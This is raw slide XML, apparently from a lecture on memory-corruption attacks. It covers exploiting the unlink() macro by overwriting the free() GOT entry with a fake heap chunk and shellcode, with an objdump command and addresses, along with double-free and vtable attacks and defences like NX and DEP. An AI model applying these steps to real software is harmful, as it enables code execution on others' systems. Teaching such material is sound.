          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="49149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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086484" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4286250"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116667"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086485" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="4514851"/>
            <a:ext cx="742962" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336224072"/>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88514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GOT entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -R ./test | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> free</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>08049924 R_386_JUMP_SLOT   free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x08049924 - 0x0c = 0x8049918</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First 8 bytes of the data portion of X will be overwritten by unlink() with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following two bytes are jump forward of 12 bytes (0xeb 0x0c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following 12 bytes are modified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="ヒラギノ角ゴ Pro W3" charset="-128"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then fake chunk with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x8049918 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = X + 8 (address of the jump instruction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second fake chunk with PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1920999102"/>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48930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Double free() Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a programmer makes the mistake of freeing a pointer that was already freed, in some cases it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A memory block X is allocated (size = N)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>free(X) is invoked and consolidated with an adjacent block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new block Y is allocated in the consolidated space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tries to use recently freed memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Y is filled with attacker-provided data, which creates a fake block starting at address X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>free(X) is called again and the unlink() macro is called because of the consolidation and memory is overwritten as in the case for the standard heap overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1937220514"/>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81346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vtables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C++ objects are allocated on the heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each object is associated with virtual function table pointer (vfptr), which points to the current definition of the object’s methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A variable overflow can be used to overwrite the vfptr so that it points to an area specified by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When a method is invoked the attacker’s code is executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11964224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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, call, ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>iret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values can be compared using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> # subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without saving the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bits are set accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ZF=0), je (ZF=1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (CF=0), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SF=OF), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer can be direct (destination is a constant) or indirect (the destination address is the content of a register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input/output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in, out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95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4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4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4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42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42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424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424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3424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3424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3424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3424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Corruption Protections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write decent programs! (impossible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a language that performs boundary checking and does not allow pointer arithmetic (e.g., Java or Python)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform analysis of the program before execution (static analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make exploitation harder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform checks on the program during execution (dynamic analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System call analysis (e.g., sequence analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect “write and execute” action sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity checking (e.g., return address integrity checks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66767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Exploitation Harder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continuous arms race: we will follow a semi-historical approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 1: Non-executable stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107795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Linux Stack Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to avoid execution of code on the stack, Linux leverages the NX bit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires that the kernel uses the Physical Address Extension mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The NX bit marks a memory area as Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eXecutable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103836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6754" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEP and W^X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Execution Prevention (DEP) is Microsoft’s implementation of the NX mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports the NX bit in hardware if present, or it emulates the mechanism if missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W^X (W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> X) is a security feature of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenBDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forces pages to be either executable or writable but not both</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129699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67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67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67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67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Problem with Non-Executable Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
